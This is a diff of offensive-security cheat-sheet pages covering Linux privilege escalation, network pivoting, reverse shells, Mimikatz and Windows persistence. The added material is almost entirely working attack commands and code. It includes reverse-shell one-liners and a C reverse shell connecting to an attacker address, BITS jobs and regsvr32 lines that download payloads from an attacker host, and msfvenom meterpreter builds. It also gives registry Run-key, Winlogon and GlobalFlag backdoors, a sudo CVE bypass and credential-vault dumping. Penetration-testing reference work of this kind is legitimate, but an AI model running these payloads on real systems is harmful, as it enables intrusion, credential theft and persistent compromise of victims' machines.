### SSH Key Predictable PRNG (Authorized_Keys) Process
|
||||||
|
|
||||||
|
This module describes how to attempt to use an obtained authorized_keys file on a host system.
|
||||||
|
|
||||||
|
Needed : SSH-DSS String from authorized_keys file
|
||||||
|
|
||||||
|
**Steps**
|
||||||
|
|
||||||
|
1. Get the authorized_keys file. An example of this file would look like so:
|
||||||
|
|
||||||
|
```
|
||||||
|
ssh-dss AAAA487rt384ufrgh432087fhy02nv84u7fg839247fg8743gf087b3849yb98304yb9v834ybf ... (snipped) ...
|
||||||
|
```
|
||||||
|
|
||||||
|
2. Since this is an ssh-dss key, we need to add that to our local copy of `/etc/ssh/ssh_config` and `/etc/ssh/sshd_config`:
|
||||||
|
|
||||||
|
```
|
||||||
|
echo "PubkeyAcceptedKeyTypes=+ssh-dss" >> /etc/ssh/ssh_config
|
||||||
|
echo "PubkeyAcceptedKeyTypes=+ssh-dss" >> /etc/ssh/sshs_config
|
||||||
|
/etc/init.d/ssh restart
|
||||||
|
```
|
||||||
|
|
||||||
|
3. Get [g0tmi1k's debian-ssh repository](https://github.com/g0tmi1k/debian-ssh) and unpack the keys:
|
||||||
|
|
||||||
|
```
|
||||||
|
git clone https://github.com/g0tmi1k/debian-ssh
|
||||||
|
cd debian-ssh
|
||||||
|
tar vjxf common_keys/debian_ssh_dsa_1024_x86.tar.bz2
|
||||||
|
```
|
||||||
|
|
||||||
|
4. Grab the first 20 or 30 bytes from the key file shown above starting with the `"AAAA..."` portion and grep the unpacked keys with it as:
|
||||||
|
|
||||||
|
```
|
||||||
|
grep -lr 'AAAA487rt384ufrgh432087fhy02nv84u7fg839247fg8743gf087b3849yb98304yb9v834ybf'
|
||||||
|
dsa/1024/68b329da9893e34099c7d8ad5cb9c940-17934.pub
|
||||||
|
```
|
||||||
|
|
||||||
|
5. IF SUCCESSFUL, this will return a file (68b329da9893e34099c7d8ad5cb9c940-17934.pub) public file. To use the private key file to connect, drop the '.pub' extension and do:
|
||||||
|
|
||||||
|
```
|
||||||
|
ssh -vvv victim@target -i 68b329da9893e34099c7d8ad5cb9c940-17934
|
||||||
|
```
|
||||||
|
|
||||||
|
And you should connect without requiring a password. If stuck, the `-vvv` verbosity should provide enough details as to why.
|
||||||
|
|
||||||
## Scheduled tasks
|
## Scheduled tasks
|
||||||
|
|
||||||
### Cron jobs
|
### Cron jobs
|
||||||
|
@ -331,6 +390,7 @@ uid=0(root) gid=1000(swissky)
|
||||||
| CAP_NET_BIND_SERVICE | SERVICE Bind a socket to internet domain privileged ports |
|
| CAP_NET_BIND_SERVICE | SERVICE Bind a socket to internet domain privileged ports |
|
||||||
|
|
||||||
## SUDO
|
## SUDO
|
||||||
|
|
||||||
Tool: [Sudo Exploitation](https://github.com/TH3xACE/SUDO_KILLER)
|
Tool: [Sudo Exploitation](https://github.com/TH3xACE/SUDO_KILLER)
|
||||||
|
|
||||||
### NOPASSWD
|
### NOPASSWD
|
||||||
|
@ -401,6 +461,18 @@ uid=0(root) gid=0(root) groups=0(root)
|
||||||
|
|
||||||
Slides of the presentation : [https://github.com/nongiach/sudo_inject/blob/master/slides_breizh_2019.pdf](https://github.com/nongiach/sudo_inject/blob/master/slides_breizh_2019.pdf)
|
Slides of the presentation : [https://github.com/nongiach/sudo_inject/blob/master/slides_breizh_2019.pdf](https://github.com/nongiach/sudo_inject/blob/master/slides_breizh_2019.pdf)
|
||||||
|
|
||||||
|
|
||||||
|
### CVE-2019-14287
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
# Exploitable when a user have the following permissions (sudo -l)
|
||||||
|
(ALL, !root) ALL
|
||||||
|
|
||||||
|
# If you have a full TTY, you can exploit it like this
|
||||||
|
sudo -u#-1 /bin/bash
|
||||||
|
sudo -u#4294967295 id
|
||||||
|
```
|
||||||
|
|
||||||
## GTFOBins
|
## GTFOBins
|
||||||
|
|
||||||
[GTFOBins](https://gtfobins.github.io) is a curated list of Unix binaries that can be exploited by an attacker to bypass local security restrictions.
|
[GTFOBins](https://gtfobins.github.io) is a curated list of Unix binaries that can be exploited by an attacker to bypass local security restrictions.
|
||||||
|
@ -434,11 +506,26 @@ Tool: [wildpwn](https://github.com/localh0t/wildpwn)
|
||||||
List world writable files on the system.
|
List world writable files on the system.
|
||||||
|
|
||||||
```powershell
|
```powershell
|
||||||
find / -writable ! -user \`whoami\` -type f ! -path "/proc/*" ! -path "/sys/*" -exec ls -al {} \; 2>/dev/null
|
find / -writable ! -user `whoami` -type f ! -path "/proc/*" ! -path "/sys/*" -exec ls -al {} \; 2>/dev/null
|
||||||
find / -perm -2 -type f 2>/dev/null
|
find / -perm -2 -type f 2>/dev/null
|
||||||
find / ! -path "*/proc/*" -perm -2 -type f -print 2>/dev/null
|
find / ! -path "*/proc/*" -perm -2 -type f -print 2>/dev/null
|
||||||
```
|
```
|
||||||
|
|
||||||
|
### Writable /etc/sysconfig/network-scripts/ (Centos/Redhat)
|
||||||
|
|
||||||
|
/etc/sysconfig/network-scripts/ifcfg-1337 for example
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
NAME=Network /bin/id <= Note the blank space
|
||||||
|
ONBOOT=yes
|
||||||
|
DEVICE=eth0
|
||||||
|
|
||||||
|
EXEC :
|
||||||
|
./etc/sysconfig/network-scripts/ifcfg-1337
|
||||||
|
```
|
||||||
|
src : [https://vulmon.com/exploitdetailsqidtp=maillist_fulldisclosure&qid=e026a0c5f83df4fd532442e1324ffa4f]
|
||||||
|
(https://vulmon.com/exploitdetails?qidtp=maillist_fulldisclosure&qid=e026a0c5f83df4fd532442e1324ffa4f)
|
||||||
|
|
||||||
### Writable /etc/passwd
|
### Writable /etc/passwd
|
||||||
|
|
||||||
First generate a password with one of the following commands.
|
First generate a password with one of the following commands.
|
||||||
|
@ -697,3 +784,4 @@ https://www.exploit-db.com/exploits/18411
|
||||||
- [Privilege Escalation by injecting process possessing sudo tokens - @nongiach @chaignc](https://github.com/nongiach/sudo_inject)
|
- [Privilege Escalation by injecting process possessing sudo tokens - @nongiach @chaignc](https://github.com/nongiach/sudo_inject)
|
||||||
* [Linux Password Security with pam_cracklib - Hal Pomeranz, Deer Run Associates](http://www.deer-run.com/~hal/sysadmin/pam_cracklib.html)
|
* [Linux Password Security with pam_cracklib - Hal Pomeranz, Deer Run Associates](http://www.deer-run.com/~hal/sysadmin/pam_cracklib.html)
|
||||||
* [Local Privilege Escalation Workshop - Slides.pdf - @sagishahar](https://github.com/sagishahar/lpeworkshop/blob/master/Local%20Privilege%20Escalation%20Workshop%20-%20Slides.pdf)
|
* [Local Privilege Escalation Workshop - Slides.pdf - @sagishahar](https://github.com/sagishahar/lpeworkshop/blob/master/Local%20Privilege%20Escalation%20Workshop%20-%20Slides.pdf)
|
||||||
|
* [SSH Key Predictable PRNG (Authorized_Keys) Process - @weaknetlabs](https://github.com/weaknetlabs/Penetration-Testing-Grimoire/blob/master/Vulnerabilities/SSH/key-exploit.md)
|
||||||
|
|
|
@ -0,0 +1,17 @@
|
||||||
|
# Miscellaneous & Tricks
|
||||||
|
|
||||||
|
All the tricks that couldn't be classified somewhere else.
|
||||||
|
|
||||||
|
## Send a message to another user
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
# Windows
|
||||||
|
PS C:\> msg Swissky /SERVER:CRASHLAB "Stop rebooting the XXXX service !"
|
||||||
|
PS C:\> msg * /V /W /SERVER:CRASHLAB "Hello all !"
|
||||||
|
|
||||||
|
# Linux
|
||||||
|
$ wall "Stop messing with the XXX service !"
|
||||||
|
$ wall -n "System will go down for 2 hours maintenance at 13:00 PM" # "-n" only for root
|
||||||
|
$ who
|
||||||
|
$ write root pts/2 # press Ctrl+D after typing the message.
|
||||||
|
```
|
|
@ -12,6 +12,8 @@
|
||||||
* [Metasploit](#metasploit)
|
* [Metasploit](#metasploit)
|
||||||
* [sshuttle](#sshuttle)
|
* [sshuttle](#sshuttle)
|
||||||
* [chisel](#chisel)
|
* [chisel](#chisel)
|
||||||
|
* [SharpChisel](#sharpchisel)
|
||||||
|
* [gost](#gost)
|
||||||
* [Rpivot](#rpivot)
|
* [Rpivot](#rpivot)
|
||||||
* [RevSocks](#revsocks)
|
* [RevSocks](#revsocks)
|
||||||
* [plink](#plink)
|
* [plink](#plink)
|
||||||
|
@ -151,6 +153,12 @@ pacman -Sy sshuttle
|
||||||
apt-get install sshuttle
|
apt-get install sshuttle
|
||||||
sshuttle -vvr user@10.10.10.10 10.1.1.0/24
|
sshuttle -vvr user@10.10.10.10 10.1.1.0/24
|
||||||
sshuttle -vvr username@pivot_host 10.2.2.0/24
|
sshuttle -vvr username@pivot_host 10.2.2.0/24
|
||||||
|
|
||||||
|
# using a private key
|
||||||
|
$ sshuttle -vvr root@10.10.10.10 10.1.1.0/24 -e "ssh -i ~/.ssh/id_rsa"
|
||||||
|
|
||||||
|
# -x == exclude some network to not transmit over the tunnel
|
||||||
|
# -x x.x.x.x.x/24
|
||||||
```
|
```
|
||||||
|
|
||||||
## chisel
|
## chisel
|
||||||
|
@ -164,6 +172,40 @@ user@victim$ .\chisel.exe client YOUR_IP:8008 R:88:127.0.0.1:88 R:389:localhost:
|
||||||
user@hacker$ /opt/chisel/chisel server -p 8008 --reverse
|
user@hacker$ /opt/chisel/chisel server -p 8008 --reverse
|
||||||
```
|
```
|
||||||
|
|
||||||
|
### SharpChisel
|
||||||
|
|
||||||
|
A C# Wrapper of Chisel : https://github.com/shantanu561993/SharpChisel
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
user@hacker$ ./chisel server -p 8080 --key "private" --auth "user:pass" --reverse --proxy "https://www.google.com"
|
||||||
|
================================================================
|
||||||
|
server : run the Server Component of chisel
|
||||||
|
-p 8080 : run server on port 8080
|
||||||
|
--key "private": use "private" string to seed the generation of a ECDSA public and private key pair
|
||||||
|
--auth "user:pass" : Creds required to connect to the server
|
||||||
|
--reverse: Allow clients to specify reverse port forwarding remotes in addition to normal remotes.
|
||||||
|
--proxy https://www.google.com : Specifies another HTTP server to proxy requests to when chisel receives a normal HTTP request. Useful for hiding chisel in plain sight.
|
||||||
|
|
||||||
|
user@victim$ SharpChisel.exe client --auth user:pass https://redacted.cloudfront.net R:1080:socks
|
||||||
|
```
|
||||||
|
|
||||||
|
## Gost
|
||||||
|
|
||||||
|
> Wiki English : https://docs.ginuerzh.xyz/gost/en/
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
git clone https://github.com/ginuerzh/gost
|
||||||
|
cd gost/cmd/gost
|
||||||
|
go build
|
||||||
|
|
||||||
|
# Socks5 Proxy
|
||||||
|
Server side: gost -L=socks5://:1080
|
||||||
|
Client side: gost -L=:8080 -F=socks5://server_ip:1080?notls=true
|
||||||
|
|
||||||
|
# Local Port Forward
|
||||||
|
gost -L=tcp://:2222/192.168.1.1:22 [-F=..]
|
||||||
|
```
|
||||||
|
|
||||||
## Rpivot
|
## Rpivot
|
||||||
|
|
||||||
Server (Attacker box)
|
Server (Attacker box)
|
||||||
|
@ -300,3 +342,4 @@ unzip ngrok-stable-linux-amd64.zip
|
||||||
* [A Red Teamer's guide to pivoting- Mar 23, 2017 - Artem Kondratenko](https://artkond.com/2017/03/23/pivoting-guide/)
|
* [A Red Teamer's guide to pivoting- Mar 23, 2017 - Artem Kondratenko](https://artkond.com/2017/03/23/pivoting-guide/)
|
||||||
* [Pivoting Meterpreter](https://www.information-security.fr/pivoting-meterpreter/)
|
* [Pivoting Meterpreter](https://www.information-security.fr/pivoting-meterpreter/)
|
||||||
* [Etat de l’art du pivoting réseau en 2019 - Oct 28,2019 - Alexandre Zanni](https://cyberdefense.orange.com/fr/blog/etat-de-lart-du-pivoting-reseau-en-2019/)
|
* [Etat de l’art du pivoting réseau en 2019 - Oct 28,2019 - Alexandre Zanni](https://cyberdefense.orange.com/fr/blog/etat-de-lart-du-pivoting-reseau-en-2019/)
|
||||||
|
* [Red Team: Using SharpChisel to exfil internal network - Shantanu Khandelwal - Jun 8](https://medium.com/@shantanukhande/red-team-using-sharpchisel-to-exfil-internal-network-e1b07ed9b49)
|
|
@ -25,6 +25,7 @@
|
||||||
* [NodeJS](#nodejs)
|
* [NodeJS](#nodejs)
|
||||||
* [Groovy](#groovy)
|
* [Groovy](#groovy)
|
||||||
* [Groovy Alternative 1](#groovy-alternative-1)
|
* [Groovy Alternative 1](#groovy-alternative-1)
|
||||||
|
* [C](#c)
|
||||||
* [Meterpreter Shell](#meterpreter-shell)
|
* [Meterpreter Shell](#meterpreter-shell)
|
||||||
* [Windows Staged reverse TCP](#windows-staged-reverse-tcp)
|
* [Windows Staged reverse TCP](#windows-staged-reverse-tcp)
|
||||||
* [Windows Stageless reverse TCP](#windows-stageless-reverse-tcp)
|
* [Windows Stageless reverse TCP](#windows-stageless-reverse-tcp)
|
||||||
|
@ -54,6 +55,8 @@ Listener:
|
||||||
nc -u -lvp 4242
|
nc -u -lvp 4242
|
||||||
```
|
```
|
||||||
|
|
||||||
|
Don't forget to check with others shell : sh, ash, bsh, csh, ksh, zsh, pdksh, tcsh, bash
|
||||||
|
|
||||||
### Socat
|
### Socat
|
||||||
|
|
||||||
```powershell
|
```powershell
|
||||||
|
@ -111,6 +114,11 @@ C:\Python27\python.exe -c "(lambda __y, __g, __contextlib: [[[[[[[(s.connect(('1
|
||||||
|
|
||||||
```bash
|
```bash
|
||||||
php -r '$sock=fsockopen("10.0.0.1",4242);exec("/bin/sh -i <&3 >&3 2>&3");'
|
php -r '$sock=fsockopen("10.0.0.1",4242);exec("/bin/sh -i <&3 >&3 2>&3");'
|
||||||
|
php -r '$sock=fsockopen("10.0.0.1",4242);shell_exec("/bin/sh -i <&3 >&3 2>&3");'
|
||||||
|
php -r '$sock=fsockopen("10.0.0.1",4242);`/bin/sh -i <&3 >&3 2>&3`;'
|
||||||
|
php -r '$sock=fsockopen("10.0.0.1",4242);system("/bin/sh -i <&3 >&3 2>&3");'
|
||||||
|
php -r '$sock=fsockopen("10.0.0.1",4242);passthru("/bin/sh -i <&3 >&3 2>&3");'
|
||||||
|
php -r '$sock=fsockopen("10.0.0.1",4242);popen("/bin/sh -i <&3 >&3 2>&3", "r");'
|
||||||
```
|
```
|
||||||
|
|
||||||
```bash
|
```bash
|
||||||
|
@ -167,6 +175,17 @@ user@attack$ ncat --ssl -vv -l -p 4242
|
||||||
user@victim$ mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -connect 10.0.0.1:4242 > /tmp/s; rm /tmp/s
|
user@victim$ mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -connect 10.0.0.1:4242 > /tmp/s; rm /tmp/s
|
||||||
```
|
```
|
||||||
|
|
||||||
|
TLS-PSK (does not rely on PKI or self-signed certificates)
|
||||||
|
```bash
|
||||||
|
# generate 384-bit PSK
|
||||||
|
# use the generated string as a value for the two PSK variables from below
|
||||||
|
openssl rand -hex 48
|
||||||
|
# server (attacker)
|
||||||
|
export LHOST="*"; export LPORT="4242"; export PSK="replacewithgeneratedpskfromabove"; openssl s_server -quiet -tls1_2 -cipher PSK-CHACHA20-POLY1305:PSK-AES256-GCM-SHA384:PSK-AES256-CBC-SHA384:PSK-AES128-GCM-SHA256:PSK-AES128-CBC-SHA256 -psk $PSK -nocert -accept $LHOST:$LPORT
|
||||||
|
# client (victim)
|
||||||
|
export RHOST="10.0.0.1"; export RPORT="4242"; export PSK="replacewithgeneratedpskfromabove"; export PIPE="/tmp/`openssl rand -hex 4`"; mkfifo $PIPE; /bin/sh -i < $PIPE 2>&1 | openssl s_client -quiet -tls1_2 -psk $PSK -connect $RHOST:$RPORT > $PIPE; rm $PIPE
|
||||||
|
```
|
||||||
|
|
||||||
### Powershell
|
### Powershell
|
||||||
|
|
||||||
```powershell
|
```powershell
|
||||||
|
@ -292,6 +311,41 @@ Thread.start {
|
||||||
}
|
}
|
||||||
```
|
```
|
||||||
|
|
||||||
|
### C
|
||||||
|
|
||||||
|
Compile with `gcc /tmp/shell.c --output csh && csh`
|
||||||
|
|
||||||
|
```csharp
|
||||||
|
#include <stdio.h>
|
||||||
|
#include <sys/socket.h>
|
||||||
|
#include <sys/types.h>
|
||||||
|
#include <stdlib.h>
|
||||||
|
#include <unistd.h>
|
||||||
|
#include <netinet/in.h>
|
||||||
|
#include <arpa/inet.h>
|
||||||
|
|
||||||
|
int main(void){
|
||||||
|
int port = 4242;
|
||||||
|
struct sockaddr_in revsockaddr;
|
||||||
|
|
||||||
|
int sockt = socket(AF_INET, SOCK_STREAM, 0);
|
||||||
|
revsockaddr.sin_family = AF_INET;
|
||||||
|
revsockaddr.sin_port = htons(port);
|
||||||
|
revsockaddr.sin_addr.s_addr = inet_addr("10.0.0.1");
|
||||||
|
|
||||||
|
connect(sockt, (struct sockaddr *) &revsockaddr,
|
||||||
|
sizeof(revsockaddr));
|
||||||
|
dup2(sockt, 0);
|
||||||
|
dup2(sockt, 1);
|
||||||
|
dup2(sockt, 2);
|
||||||
|
|
||||||
|
char * const argv[] = {"/bin/sh", NULL};
|
||||||
|
execve("/bin/sh", argv, NULL);
|
||||||
|
|
||||||
|
return 0;
|
||||||
|
}
|
||||||
|
```
|
||||||
|
|
||||||
## Meterpreter Shell
|
## Meterpreter Shell
|
||||||
|
|
||||||
### Windows Staged reverse TCP
|
### Windows Staged reverse TCP
|
||||||
|
@ -393,6 +447,19 @@ lua: os.execute('/bin/sh')
|
||||||
- nmap: `!sh`
|
- nmap: `!sh`
|
||||||
- mysql: `! bash`
|
- mysql: `! bash`
|
||||||
|
|
||||||
|
Alternative TTY method
|
||||||
|
|
||||||
|
```
|
||||||
|
www-data@debian:/dev/shm$ su - user
|
||||||
|
su: must be run from a terminal
|
||||||
|
|
||||||
|
www-data@debian:/dev/shm$ /usr/bin/script -qc /bin/bash /dev/null
|
||||||
|
www-data@debian:/dev/shm$ su - user
|
||||||
|
Password: P4ssW0rD
|
||||||
|
|
||||||
|
user@debian:~$
|
||||||
|
```
|
||||||
|
|
||||||
## Fully interactive reverse shell on Windows
|
## Fully interactive reverse shell on Windows
|
||||||
The introduction of the Pseudo Console (ConPty) in Windows has improved so much the way Windows handles terminals.
|
The introduction of the Pseudo Console (ConPty) in Windows has improved so much the way Windows handles terminals.
|
||||||
|
|
||||||
|
|
|
@ -2,15 +2,16 @@
|
||||||
|
|
||||||
## Summary
|
## Summary
|
||||||
|
|
||||||
* [Mimikatz - Execute commands](#)
|
* [Mimikatz - Execute commands](#mimikatz---execute-commands)
|
||||||
* [Mimikatz - Extract passwords](#)
|
* [Mimikatz - Extract passwords](#mimikatz---extract-passwords)
|
||||||
* [Mimikatz - Mini Dump](#)
|
* [Mimikatz - Mini Dump](#mimikatz---mini-dump)
|
||||||
* [Mimikatz - Golden ticket](#)
|
* [Mimikatz - Pass The Hash](#mimikatz---pass-the-hash)
|
||||||
* [Mimikatz - Skeleton key](#)
|
* [Mimikatz - Golden ticket](#mimikatz---golden-ticket)
|
||||||
* [Mimikatz - RDP session takeover](#)
|
* [Mimikatz - Skeleton key](#mimikatz---skeleton-key)
|
||||||
* [Mimikatz - Credential Manager & DPAPI](#)
|
* [Mimikatz - RDP session takeover](#mimikatz---rdp-session-takeover)
|
||||||
* [Mimikatz - Commands list](#)
|
* [Mimikatz - Credential Manager & DPAPI](#mimikatz---credential-manager--dpapi)
|
||||||
* [Mimikatz - Powershell version](#)
|
* [Mimikatz - Commands list](#mimikatz---commands-list)
|
||||||
|
* [Mimikatz - Powershell version](#mimikatz---powershell-version)
|
||||||
* [References](#references)
|
* [References](#references)
|
||||||
|
|
||||||
![Data in memory](http://adsecurity.org/wp-content/uploads/2014/11/Delpy-CredentialDataChart.png)
|
![Data in memory](http://adsecurity.org/wp-content/uploads/2014/11/Delpy-CredentialDataChart.png)
|
||||||
|
@ -109,6 +110,8 @@ rdesktop 10.0.0.2:3389 -u test -p mimikatz -d pentestlab
|
||||||
|
|
||||||
## Mimikatz - RDP session takeover
|
## Mimikatz - RDP session takeover
|
||||||
|
|
||||||
|
Use `ts::multirdp` to patch the RDP service to allow more than two users.
|
||||||
|
|
||||||
Run tscon.exe as the SYSTEM user, you can connect to any session without a password.
|
Run tscon.exe as the SYSTEM user, you can connect to any session without a password.
|
||||||
|
|
||||||
```powershell
|
```powershell
|
||||||
|
@ -125,6 +128,8 @@ net start sesshijack
|
||||||
```
|
```
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
## Mimikatz - Credential Manager & DPAPI
|
## Mimikatz - Credential Manager & DPAPI
|
||||||
|
|
||||||
```powershell
|
```powershell
|
||||||
|
@ -141,6 +146,21 @@ $ mimikatz !sekurlsa::dpapi
|
||||||
$ mimikatz dpapi::cred /in:C:\Users\<username>\AppData\Local\Microsoft\Credentials\2647629F5AA74CD934ECD2F88D64ECD0 /masterkey:95664450d90eb2ce9a8b1933f823b90510b61374180ed5063043273940f50e728fe7871169c87a0bba5e0c470d91d21016311727bce2eff9c97445d444b6a17b
|
$ mimikatz dpapi::cred /in:C:\Users\<username>\AppData\Local\Microsoft\Credentials\2647629F5AA74CD934ECD2F88D64ECD0 /masterkey:95664450d90eb2ce9a8b1933f823b90510b61374180ed5063043273940f50e728fe7871169c87a0bba5e0c470d91d21016311727bce2eff9c97445d444b6a17b
|
||||||
```
|
```
|
||||||
|
|
||||||
|
Task Scheduled credentials
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
mimikatz(commandline) # vault::cred /patch
|
||||||
|
TargetName : Domain:batch=TaskScheduler:Task:{CF3ABC3E-4B17-ABCD-0003-A1BA192CDD0B} / <NULL>
|
||||||
|
UserName : DOMAIN\user
|
||||||
|
Comment : <NULL>
|
||||||
|
Type : 2 - domain_password
|
||||||
|
Persist : 2 - local_machine
|
||||||
|
Flags : 00004004
|
||||||
|
Credential : XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
|
||||||
|
Attributes : 0
|
||||||
|
```
|
||||||
|
|
||||||
|
|
||||||
## Mimikatz - Commands list
|
## Mimikatz - Commands list
|
||||||
|
|
||||||
| Command |Definition|
|
| Command |Definition|
|
||||||
|
|
|
@ -6,17 +6,26 @@
|
||||||
* [Disable Windows Defender](#disable-windows-defender)
|
* [Disable Windows Defender](#disable-windows-defender)
|
||||||
* [Disable Windows Firewall](#disable-windows-firewall)
|
* [Disable Windows Firewall](#disable-windows-firewall)
|
||||||
* [Userland](#userland)
|
* [Userland](#userland)
|
||||||
* [Registry](#registry)
|
* [Registry HKCU](#registry-hkcu)
|
||||||
* [Startup](#startup)
|
* [Startup](#startup)
|
||||||
* [Scheduled Task](#scheduled-task)
|
* [Scheduled Task](#scheduled-task)
|
||||||
|
* [BITS Jobs](#bits-jobs)
|
||||||
* [Serviceland](#serviceland)
|
* [Serviceland](#serviceland)
|
||||||
* [IIS](#iis)
|
* [IIS](#iis)
|
||||||
* [Windows Service](#windows-service)
|
* [Windows Service](#windows-service)
|
||||||
* [Elevated](#elevated)
|
* [Elevated](#elevated)
|
||||||
* [HKLM](#hklm)
|
* [Registry HKLM](#registry-hklm)
|
||||||
|
* [Winlogon Helper DLL](#)
|
||||||
|
* [GlobalFlag](#)
|
||||||
* [Services](#services)
|
* [Services](#services)
|
||||||
* [Scheduled Task](#scheduled-task)
|
* [Scheduled Task](#scheduled-task)
|
||||||
|
* [Binary Replacement](#binary-replacement)
|
||||||
|
* [Binary Replacement on Windows XP+](#binary-replacement-on-windows-xp)
|
||||||
|
* [Binary Replacement on Windows 10+](#binary-replacement-on-windows-10)
|
||||||
* [RDP Backdoor](#rdp-backdoor)
|
* [RDP Backdoor](#rdp-backdoor)
|
||||||
|
* [utilman.exe](#utilman.exe)
|
||||||
|
* [sethc.exe](#sethc.exe)
|
||||||
|
* [Skeleton Key](#skeleton-key)
|
||||||
* [References](#references)
|
* [References](#references)
|
||||||
|
|
||||||
|
|
||||||
|
@ -59,6 +68,15 @@ Value name: Backdoor
|
||||||
Value data: C:\Users\Rasta\AppData\Local\Temp\backdoor.exe
|
Value data: C:\Users\Rasta\AppData\Local\Temp\backdoor.exe
|
||||||
```
|
```
|
||||||
|
|
||||||
|
Using the command line
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v Evil /t REG_SZ /d "C:\Users\user\backdoor.exe"
|
||||||
|
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce" /v Evil /t REG_SZ /d "C:\Users\user\backdoor.exe"
|
||||||
|
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServices" /v Evil /t REG_SZ /d "C:\Users\user\backdoor.exe"
|
||||||
|
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce" /v Evil /t REG_SZ /d "C:\Users\user\backdoor.exe"
|
||||||
|
```
|
||||||
|
|
||||||
Using SharPersist
|
Using SharPersist
|
||||||
|
|
||||||
```powershell
|
```powershell
|
||||||
|
@ -104,6 +122,23 @@ SharPersist -t schtask -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -n "Som
|
||||||
SharPersist -t schtask -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -n "Some Task" -m add -o hourly
|
SharPersist -t schtask -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -n "Some Task" -m add -o hourly
|
||||||
```
|
```
|
||||||
|
|
||||||
|
|
||||||
|
### BITS Jobs
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
bitsadmin /create backdoor
|
||||||
|
bitsadmin /addfile backdoor "http://10.10.10.10/evil.exe" "C:\tmp\evil.exe"
|
||||||
|
|
||||||
|
# v1
|
||||||
|
bitsadmin /SetNotifyCmdLine backdoor C:\tmp\evil.exe NUL
|
||||||
|
bitsadmin /SetMinRetryDelay "backdoor" 60
|
||||||
|
bitsadmin /resume backdoor
|
||||||
|
|
||||||
|
# v2 - exploit/multi/script/web_delivery
|
||||||
|
bitsadmin /SetNotifyCmdLine backdoor regsvr32.exe "/s /n /u /i:http://10.10.10.10:8080/FHXSd9.sct scrobj.dll"
|
||||||
|
bitsadmin /resume backdoor
|
||||||
|
```
|
||||||
|
|
||||||
## Serviceland
|
## Serviceland
|
||||||
|
|
||||||
### IIS
|
### IIS
|
||||||
|
@ -126,7 +161,7 @@ SharPersist -t service -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -n "Som
|
||||||
|
|
||||||
## Elevated
|
## Elevated
|
||||||
|
|
||||||
### HKLM
|
### Registry HKLM
|
||||||
|
|
||||||
Similar to HKCU. Create a REG_SZ value in the Run key within HKLM\Software\Microsoft\Windows.
|
Similar to HKCU. Create a REG_SZ value in the Run key within HKLM\Software\Microsoft\Windows.
|
||||||
|
|
||||||
|
@ -135,6 +170,41 @@ Value name: Backdoor
|
||||||
Value data: C:\Windows\Temp\backdoor.exe
|
Value data: C:\Windows\Temp\backdoor.exe
|
||||||
```
|
```
|
||||||
|
|
||||||
|
Using the command line
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v Evil /t REG_SZ /d "C:\tmp\backdoor.exe"
|
||||||
|
reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce" /v Evil /t REG_SZ /d "C:\tmp\backdoor.exe"
|
||||||
|
reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices" /v Evil /t REG_SZ /d "C:\tmp\backdoor.exe"
|
||||||
|
reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce" /v Evil /t REG_SZ /d "C:\tmp\backdoor.exe"
|
||||||
|
```
|
||||||
|
|
||||||
|
#### Winlogon Helper DLL
|
||||||
|
|
||||||
|
> Run executable during Windows logon
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.10 LPORT=4444 -f exe > evilbinary.exe
|
||||||
|
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.10 LPORT=4444 -f dll > evilbinary.dll
|
||||||
|
|
||||||
|
reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Userinit /d "Userinit.exe, evilbinary.exe" /f
|
||||||
|
reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Shell /d "explorer.exe, evilbinary.exe" /f
|
||||||
|
Set-ItemProperty "HKLM:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" "Userinit" "Userinit.exe, evilbinary.exe" -Force
|
||||||
|
Set-ItemProperty "HKLM:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" "Shell" "explorer.exe, evilbinary.exe" -Force
|
||||||
|
```
|
||||||
|
|
||||||
|
|
||||||
|
#### GlobalFlag
|
||||||
|
|
||||||
|
> Run executable after notepad is killed
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe" /v GlobalFlag /t REG_DWORD /d 512
|
||||||
|
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe" /v ReportingMode /t REG_DWORD /d 1
|
||||||
|
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe" /v MonitorProcess /d "C:\temp\evil.exe"
|
||||||
|
```
|
||||||
|
|
||||||
|
|
||||||
### Services
|
### Services
|
||||||
|
|
||||||
Create a service that will start automatically or on-demand.
|
Create a service that will start automatically or on-demand.
|
||||||
|
